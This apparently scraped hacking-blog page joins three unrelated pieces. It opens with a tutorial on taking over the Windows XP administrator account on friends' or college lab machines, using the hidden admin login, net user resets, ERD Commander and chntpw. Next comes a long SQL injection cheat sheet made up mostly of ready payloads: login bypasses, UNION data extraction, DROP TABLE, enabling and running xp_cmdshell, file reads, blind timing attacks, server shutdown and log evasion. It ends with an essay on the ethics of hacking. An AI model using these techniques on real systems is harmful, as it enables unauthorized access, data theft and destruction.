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Hack Into Administrator Account

Hello friends, welcome back today i am going to share with you all possible ways to hack admin or administrator account in windows XP. Today i will explain how to hack admin or administrator account in just 2 minutes. So guys get ready to hack your friends systems in 2 minutes.
Most of times specially in our college we don't have the access to the admin account, now suppose you want to install a software on that system. What you will do now? Ask the admin to enter the password for you or simply hack it by yourself. I will tell you frankly that i have never opted method one in my life. Whenever i need administrator right i have hacked it but guys don't do it like that ways because i got suspended from lab twice for doing that.
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There are four ways to hack the admin password:
1. Simply accessing Unprotected Administrator Account.
2. Hacking Through Net User Command.
3. Hacking Using the ERD(Emergency Rescue Disk)  Commander.
4. Resetting admin password using Ubuntu Live CD or DVD. 

Lets start from the first technique to hack the admin or administrator password..

1. Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in snapshot below...
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Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..

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Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecured i.e User as some other username like above shown figure...


2. Hacking admin or administrator account using net user command
Note: This will work only when user has access of user account or some how he has been allowed  or working in admin account.

Steps to hack admin account:
Step1: Goto the Start and click on Run and Type cmd and press enter ... 
Step 2: Now type "net user" in the command prompt to obtain the All accounts on that computer.. as shown in figure..

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Step 3: Now Select the account Which u want to Reset the Password...
Suppose that we want to Reset the Password  of Administrator...
Now Type "net user Administrator *  " Without quotes... and press Enter. As shown in the Below Figure..

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Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account .. It will not require any Password..


3. Hacking admin account using ERD commander (100% working hack)
This hack has no restrictions , using this hack you can hack each and every computer.

First of all Download the ERD(Emergency Rescue Disk)  commander... Extract the Files and Make a CD...

STEPS INVOLVED :
1. Insert the ERD Commander Boot CD into the drive and restart the system
2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
3. Select your Windows XP installation from the list as shown.


How to hack Admin Account
4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith
How to hack Admin Account

5. Click Next

How to hack Admin Account

6. Select the administrator account from the list for which you want to reset the password.
How to hack Admin Account

7. Type the new password in both the boxes, click Next and click Finish

How to hack Admin Account

8 . Restart The System and take the CD out of the Drive..And Enjoy Admin account...

Method 4: Resetting windows password using Ubuntu Live CD or DVD
For this hack you will require the Ubuntu Live CD. 

Steps involved :
 
  1. Insert Ubuntu Live CD and boot from it.
  2. Open terminal and install chntpw in Ubuntu. To do so use the following commands.
    sudo apt-get update
    sudo apt-get install chntpw
  3. Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
    sudo mkdir /media/WINDOWS
    sudo mount /dev/sda1 /media/WINDOWS
  4. Now navigate to the Windows configuration folder.
    cd /media/WINDOWS/WINDOWS/system32/config/
  5. To reset the administrator password enter
    sudo chntpw SAM
  6. After completing this command you will see 5 different choices. Select the 1st one and press Enter and its done. 
  7. Now restart your system, it will not ask any password
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How to SQL injection Hacker made Hacking easy


Line Comments



Comments out rest of the query.

Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.

* -- (SM)


DROP sampletable;--


* # (M)


DROP sampletable;#

Line Comments Sample SQL Injection Attacks

* Username: admin'--
*

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.

Inline Comments

Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

* /*Comment Here*/ (SM)
o DROP/*comment*/sampletable
o DR/**/OP/*bypass blacklisting*/sampletable
o SELECT/*avoid-spaces*/password/**/FROM/**/Members


*

/*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.


SELECT /*!32302 1/0, */ 1 FROM tablename

Classical Inline Comment SQL Injection Attack Samples

*

ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --


*

SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02

MySQL Version Detection Sample Attacks

* ID: /*!32302 10*/
*

ID: 10
You will get the same response if MySQL version is higher than 3.23.02


*

SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02

Stacking Queries

Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.

*

; (S)
SELECT * FROM members; DROP members--

Ends a query and starts a new one.

Language / Database Stacked Query Support Table

green: supported, dark gray: not supported, light gray: unknown

SQL Server MySQL PostgreSQL ORACLE MS Access ASP ASP.NET PHP Java






About MySQL and PHP;

To clarify some issues;

PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?

Stacked SQL Injection Attack Samples

* ID: 10;DROP members --
* SELECT * FROM products WHERE id = 10; DROP members--



This will run DROP members SQL sentence after normal SQL Query.

If Statements

Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.

MySQL If Statement

* IF(condition,true-part,false-part) (M)


SELECT IF(1=1,'true','false')

SQL Server If Statement

*

IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'

If Statement SQL Injection Attack Samples



if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)

This will throw an divide by zero error if current logged user is not "sa" or "dbo".

Using Integers

Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.

*

0xHEXNUMBER (SM)
You can write hex like these;



SELECT CHAR(0x66) (S)

SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0x50 + 0x45 (this is integer now!) (M)

String Operations

String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.

String Concatenation

*

+ (S)
SELECT login + '-' + password FROM members


*

|| (*MO)
SELECT login || '-' || password FROM members



*About MySQL "||";

If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using CONCAT() function in MySQL.

*

CONCAT(str1, str2, str3, ...) (M)

Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members

Strings without Quotes

These are some direct ways to using strings but it’s always possible to use CHAR()(MS) andCONCAT()(M) to generate string without quotes.

*

0x457578 (M) - Hex Representation of string

SELECT 0x457578
This will be selected as string in MySQL.



In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))


*

Using CONCAT() in MySQL

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ‘KLM’.


*

SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return ‘KLM’.

Hex based SQL Injection Samples

*

SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This will show the content of c:\boot.ini

String Modification & Related

*

ASCII() (SMP)
Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.


SELECT ASCII('a')


*

CHAR() (SM)
Convert an integer of ASCII.


SELECT CHAR(64)

Union Injections

With union you do SQL queries cross-table. Basically you can poison query to return records from another table.



SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members

This will combine results from both news table and members table and return all of them.



Another Example :

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

UNION – Fixing Language Issues

While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.

*

SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.


SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members


*

MySQL (M)
Hex() for every possible issue

Bypassing Login Screens (SMO+)

SQL Injection 101, Login tricks

* admin' --
* admin' #
* admin'/*
* ' or 1=1--
* ' or 1=1#
* ' or 1=1/*
* ') or '1'='1--
* ') or ('1'='1--
* ....

*

Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries

Bypassing second MD5 hash check login screens

If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.

Bypassing MD5 Hash Check Example (MSP)



Username : admin

Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)



Error Based - Find Columns Names

Finding Column Names with HAVING BY - Error Based (S)

In the same order,

* ' HAVING 1=1 --
* ' GROUP BY table.columnfromerror1 HAVING 1=1 --
* ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
* ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
* If you are not getting any more error then it's done.

Finding how many columns in SELECT query by ORDER BY (MSO+)

Finding column number by ORDER BY can speed up the UNION SQL Injection process.

* ORDER BY 1--
* ORDER BY 2--
* ORDER BY N-- so on
* Keep going until get an error. Error means you found the number of selected columns.

Data types, UNION, etc.

Hints,

* Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
* To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
* Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
o Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)

Finding Column Type

*

' union select sum(columntofind) from users-- (S)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.


If you are not getting error it means column is numeric.


* Also you can use CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--


*

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
No Error - Syntax is right. MS SQL Server Used. Proceeding.


*

11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
No Error – First column is an integer.


*

11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
Error! – Second column is not an integer.


*

11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
No Error – Second column is a string.


*

11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
Error! – Third column is not an integer. ...



Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.

You’ll get convert() errors before union target errors ! So start with convert() then union

Simple Insert (MSO+)

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes



@@version (MS)

Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions.

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)

Bulk Insert (S)

Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

1.
1. Create table foo( line varchar(8000) )
2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop temp table, and repeat for another file.

BCP (S)



Write text file. Login Credentials are required to use this function.

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

VBS, WSH in SQL Server (S)

You can use VBS, WSH scripting in SQL Server because of ActiveX support.



declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --

Executing system commands, xp_cmdshell (S)

Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.



EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Simple ping check (configure your firewall or sniffer to identify request before launch it),

EXEC master.dbo.xp_cmdshell 'ping '

You can not read results directly from error or union or something else.

Some Special Tables in SQL Server (S)

*

Error Messages
master..sysmessages


*

Linked Servers
master..sysservers


*

Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )

SQL Server 2000: masters..sysxlogins
SQL Server 2005 :

sys.sql_logins

More Stored Procedures for SQL Server (S)

1.

Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'


2.

Registry Stuff (xp_regread)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8.

xp_regwrite

exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'


3.

Managing Services (xp_servicecontrol)
4.

Medias (xp_availablemedia)
5.

ODBC Resources (xp_enumdsn)
6.

Login mode (xp_loginconfig)
7.

Creating Cab Files (xp_makecab)
8.

Domain Enumeration (xp_ntsec_enumdomains)
9.

Process Killing (need PID) (xp_terminate_process)
10.

Add new procedure (virtually you can execute whatever you want)

sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
11.

Write text file to a UNC or an internal path (sp_makewebtask)

MSSQL Bulk Notes

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0



HOST_NAME()

IS_MEMBER (Transact-SQL)

IS_SRVROLEMEMBER (Transact-SQL)

OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

You can not use sub selects in SQL Server Insert queries.

SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

If injection is in second limit you can comment it out or use in your union injection

Shutdown SQL Server (S)

When you really pissed off, ';shutdown --

Enabling xp_cmdshell in SQL Server 2005

By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.



EXEC sp_configure 'show advanced options',1

RECONFIGURE



EXEC sp_configure 'xp_cmdshell',1

RECONFIGURE

Finding Database Structure in SQL Server (S)

Getting User defined Tables

SELECT name FROM sysobjects WHERE xtype = 'U'

Getting Column Names

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

Moving records (S)

*

Modify WHERE and use NOT IN or NOT EXIST,

... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one


*

Using Dirty Tricks

SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21



Fast way to extract data from Error Based SQL Injections in SQL Server (S)

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--



Detailed Article : Fast way to extract data from Error Based SQL Injections

Blind SQL Injections

About Blind SQL Injections

In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.



Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code

Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL,pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.

Real and a bit Complex Blind SQL Injection Attack Sample

This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.

TRUE and FALSE flags mark queries returned true or false.

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--



FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--



TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--



FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--



TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--



FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--



TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--



FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--



FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.



Waiting For Blind SQL Injections

First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.

WAIT FOR DELAY 'time' (S)

This is just like sleep, wait for spesified time. CPU safe way to make database wait.

WAITFOR DELAY '0:0:10'--

Also you can use fractions like this,

WAITFOR DELAY '0:0:0.51'

Real World Samples

*

Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
* ProductID = 1;waitfor delay '0:0:10'--
* ProductID =1);waitfor delay '0:0:10'--
* ProductID =1';waitfor delay '0:0:10'--
* ProductID =1');waitfor delay '0:0:10'--
* ProductID =1));waitfor delay '0:0:10'--
* ProductID =1'));waitfor delay '0:0:10'--

BENCHMARK() (M)

Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

BENCHMARK(howmanytimes, do this)

Real World Samples

*

Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))


*

Check Table exist in MySQL

IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

pg_sleep(seconds) (P)

Sleep for supplied seconds.

*

SELECT pg_sleep(10);
Sleep 10 seconds.

Covering Tracks

SQL Server -sp_password log bypass (S)

SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)

Clear SQL Injection Tests

These tests are simply good for blind sql injection and silent attacks.

1. product.asp?id=4 (SMO)
1. product.asp?id=5-1
2. product.asp?id=4 OR 1=1


2. product.asp?name=Book
1. product.asp?name=Bo’%2b’ok
2. product.asp?name=Bo’ || ’ok (OM)
3. product.asp?name=Book’ OR ‘x’=’x

Some Extra MySQL Notes

* Sub Queries are working only MySQL 4.1+
* Users
o SELECT User,Password FROM mysql.user;
* SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
* SELECT ... INTO DUMPFILE
o Write query into a new file (can not modify existing files)
* UDF Function
o create function LockWorkStation returns integer soname 'user32';
o

select LockWorkStation();
o create function ExitProcess returns integer soname 'kernel32';
o select exitprocess();
* SELECT USER();
* SELECT password,USER() FROM mysql.user;
* First byte of admin hash
o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
* Read File
o query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
*

MySQL Load Data inifile
o By default it’s not avaliable !
+

create table foo( line blob );

load data infile 'c:/boot.ini' into table foo;
select * from foo;
* More Timing in MySQL
* select benchmark( 500000, sha1( 'test' ) );
* query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
*

select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

Potentially Useful MySQL Functions

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MD5()

MD5 Hashing
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SHA1()
SHA1 Hashing


* PASSWORD()
* ENCODE()
*

COMPRESS()

Compress data, can be great in large binary reading in Blind SQL Injections.
* ROW_COUNT()
* SCHEMA()
*

VERSION()
Same as @@version

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Computer Hacks, Hacking, and Hackers


Webster's College Dictionary Definitions

hack(1) (v)
1. to cut, notch, slice, chop, or sever with irregular, often heavy blows (often fol. by up or down): to hack down trees 2. to clear (a road, path, etc.) by cutting away vines, trees, or other growth.
hack(2) (n)
1. a person, esp. a professional, who surrenders individual independence, integrity, belief, etc., in return for money or other reward; a political hack. 3. a person who produces banal or mediocre work or who works at a dull or routine task.
hacker (n)
1. a person or thing that hacks. 2. a person who engages in an activity without talent or skill. 3.Slang a. a computer enthusiast who is especially proficient in programming. b. a computer user who attempts to gain unauthorized access to proprietary computer systems.

Towards a true understanding of the term `hack'

Which one of the above definitions should be used to best explain the concept of hacking? None of them! Definitions are tricky things, almost as tricky as the words they attempt to describe; this can be best illustrated in slang and buzz words. Jargon is invented and used in small, usually specialized, groups. Then, eventually, it is expanded and used by people with slightly less expertise. All jargon suffers from the possibility of the media bastardizing it into a buzz word; however, the occurrence of this bastardization is much more frequent in the computer & information sciences and the computer industry. This is quite possibly due to the lack of understanding which people have who are not in these "circles". At any rate, if a word means many very different things to different people, a common, agreed upon, definition may be impossible.
I believe in an idea of hacking which most closely relates to its origins. The following are, in decreasing order, traits for a hack:
  1. It must be clever.
  2. It must produce more good than bad, and it must not be malicious.
  3. It should be unexpected, or out of the ordinary.
  4. It should also be aesthetic to the creator(s) and their cronies.
  5. It need not pertain to computers.
These are usually straight forward. Obviously, that which is clever to a novice is usually simple and commonplace to an expert; however, a group can, with their conventional wisdom, decide on the cleverness of a would be hack for areas which fall under their domain of expertise. The debate between the good and bad nature, as well as intent, of a hack may let in some unethical acts, and this idea will be expounded upon in the next section.Hacks should be inventive; using someone else's hack is not a hack. A hack should look good to the author(s) and their friends, and, if it does not, then a term like kludge would better apply. And, finally, there is no reason that a hack must pertain to computers; MIT is famous for both computer related and unrelated hacks. This may not be the perfect definition of the term in question, but it is what I think of when I use it. I hope this is how you think of a hack when you use the term in the future.

The ethics of computers and hacking

The ethics of computers, like the ethics of societies, are not impartial, constant, and no particular set of ethics can be proven correct. Great philosophers --such as Aristotle, Mill, and Kant-- spent years creating thier own, different, and sometimes incompatible theories of ethics. Furthermore, it cannot even be proven which set of beliefs is better. The debate on ethics is too large for this essay; however, the idea that different people have different ethical beliefs and none of them can be proven to be better than another is enough here.
Anything involving theft, destruction, etc. is not a hack because it is malicious. What if I just break into someones computer to read their email? That seems not to be malicious, but it is by most accounts ethically wrong. Although, what if I work for the Government and the email I read is that of a known drug dealer? This case is not so easy; nevertheless, many people --including myself-- would say that it is unethical. Now suppose that my friend is running a program which will destroy his computer, and I can save the computer by breaking in and stopping the program. Now, due to the intent of the actions, the ethical nature of this action is very unclear. However, my means of entry may still be a hack, even though the ethicality of the act is not easily determined. Or, the, possibly unethical, means by which I gain the information to break into his computer could be the hack.
 
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